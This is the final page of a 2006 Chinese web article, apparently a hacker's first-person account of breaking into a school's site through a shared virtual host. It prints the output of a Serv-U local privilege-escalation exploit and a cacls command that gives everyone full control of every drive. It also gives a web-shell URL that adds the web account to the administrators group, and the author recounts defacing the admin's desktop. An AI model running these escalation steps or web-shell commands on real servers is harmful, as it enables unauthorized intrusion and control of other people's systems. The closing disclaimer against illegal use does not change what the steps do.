WEB开发网
开发学院网络安全黑客技术 剑走偏锋——灵巧的旁注攻击 阅读

剑走偏锋——灵巧的旁注攻击

 2006-11-05 20:36:19 来源:WEB开发网   
核心提示: 返回下面的信息,就表示成功了!!!Serv-u >3.x Local Exploit by xiaolu<220 Serv-U FTP Server v5.2 for WinSock ready...>USER LocalAdministrator<331 User

返回下面的信息,就表示成功了!!!

Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
******************************************************

每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为 everyone 完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员:

http://anyhost//cmd.pl?d:userinsu.exe " net localgroup administrators IUSR_anyhost /add"

现在我们通过 web 方式,执行的命令就是以 administrator 的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个 3389 的肉鸡的,想想算了,这种 BT 管理员的地盘,我也占领不了多久,留点提示到他的桌面就 over 了。

说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了 Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。

注:天极网刊登这篇文章只为介绍这种技术,并不代表天极网观点。任何人不得用些技术做非法的事情。

上一页  1 2 3 4 5 6 

Tags:偏锋 灵巧 旁注

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接